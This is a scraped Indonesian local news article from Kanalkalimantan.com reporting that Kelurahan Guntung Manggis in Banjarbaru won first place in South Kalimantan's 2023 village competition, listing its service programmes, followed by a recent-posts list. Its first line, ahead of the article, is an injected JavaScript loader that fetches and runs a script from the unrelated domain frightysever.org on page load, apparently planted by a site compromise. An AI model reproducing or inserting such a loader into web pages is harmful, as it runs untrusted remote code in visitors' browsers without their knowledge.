(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Kelurahan Guntung Manggis Juara Terbaik 1 Lomba Desa Kelurahan se Kalsel


KANALKALIMANTAN.COM, BANJARBARU – Wali Kota Banjarbaru HM Aditya Mufti Ariffin didampingi Lurah Guntung Manggis Zikru Rakhman menerima piala penghargaan juara terbaik 1 dalam lomba Desa Kelurahan tingkat Provinsi Kalimantan Selatan tahun 2023.

Piala lomba diserahkan dalam momentum Hari Jadi Ke-73 Provinsi Kalimantan Selatan yang diselenggarakan di Siring 0 Kilometer Banjarmasin, Selasa (15/8/2023).

Wali Kota Banjarbaru mengungkapkan apresiasi luar biasa atas kerja keras seluruh jajaran Kelurahan Guntung Manggis. Aditya berharap pencapaian ini dapat memacu kelurahan lain yang ada di Banjarbaru untuk dapat berinovasi dan memberikan pelayanan terbaik kepada masyarakat.

Baca juga: Gubernur Sahbirin Bicara Capaian Pembangunan di Hari Jadi Ke-73 Provinsi Kalsel

“Alhamdulillah, harapan kita semoga di tahun-tahun yang akan datang kelurahan lain di Banjarbau juga dapat meraih juara. Pada intinya komunikasi antara pihak Kelurahan dan masyarakat harus terjalin baik dan saling mendukung untuk memajukan wilayah. Dengan begitu, Insya Allah pasti bisa meraih juara,” tutur Aditya.

Kelurahan Guntung Manggis berhasil terpilih sebagi juara dalam lomba Desa Kelurahan tingkat provinsi lewat berbagai program unggulan yang digagas oleh Wali Kota Aditya. Program yang tentunya mengutamakan pelayanan yang dikhususkan untuk memudahkan masyarakat dan memajukan wilayah itu sendiri.

Program-program Kelurahan Guntung Manggis yang berhasil dilaksanakan di antaranya, pelaksanaan Jemput Bola (Jebol) yaitu melaksanakan pendataan warga tidak mampu yang belum termasuk dalam DTKS dan PKH untuk dapat dicarikan bantuan melalui kerjasama dengan Yayasan Insan Berkah Mulia, serta pendataan rumah tidak layak huni untuk dapat dibantu dalam hal renovasi.

Baca juga: Warga Padati Stan Kuliner Gratis Hari Jadi Ke-73 Kalsel

Program Minggu Babarasih (Mibar), gotong royong kebersihan lingkungan di tingkat RT. Sadar Pajak Dari Diri Sendiri (Sajari) yaitu dalam rangka peningkatan pendapatan pajak PBB dengan mencantumkan data lunas PBB tahun berjalan dalam setiap layanan kelurahan.

Konsultasi pelayanan melalui WhatsApp, yaitu program konsultasi masyarakat kepada petugas pelayanan melalui pesan daring, seperti menanyakan persyaratan suatu layanan serta untuk pengaduan pelayanan di kelurahan.

Hingga Aplikasi Sistem Pelayanan Administrasi Kelurahan dan Kecamatan (SIAPKK) yaitu program aplikasi yang bisa diakses secara online untuk mengurus salah satu layanan yang ada di kelurahan.

Baca juga:Driver Ojol Minta Dishub Kalsel Revisi SK Gubernur

“Dukungan bapak Wali Kota dan kerjasama masyarakat di Kelurahan Guntung Manggis sangat besar. Adanya program- program yang dijalankan ditingkat kelurahan, seperti program RT mandiri untuk peningkatan ekonomi pasca Covid-19, homecare untuk lansia, pelayanan berbasis elektronik, serta pemberian pelatihan UMKM berupa kerajinan rajutan yang dibina Ketua TP PKK Kota Banjarbaru,” kata Lurah Zikru.

Atas raihan juara Terbaik 1 ini, Kelurahan Guntung Manggis mewakil kelurahan dan desa lainnya di Provinsi Kalimantan Selatan berkesempatan untuk mengikuti lomba Desa Kelurahan di tingkat regional. Dalam hal ini, Lurah Zikru meminta dukungan masyarakat Banjarbaru khususnya masyarakat Guntung Manggis agar diberikan kemudahan dan kelancaran dalam lomba tingkat regional nantinya. (Kanalkalimantan.com/bie)

Reporter : bie
Editor : kk


Muhammad Andi

Recent Posts

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

1 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

3 jam ago

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

4 jam ago

780 Anggota PPK se Kalsel Dilantik, Bertugas 8 Bulan

KANALKALIMANTAN.COM, BANJARBARU - Seluruh Panitia Pemilihan Kecamatan (PPK) di Provinsi Kalimantan Selatan (Kalsel) resmi dilantik… Read More

4 jam ago

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

7 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

19 jam ago

This website uses cookies.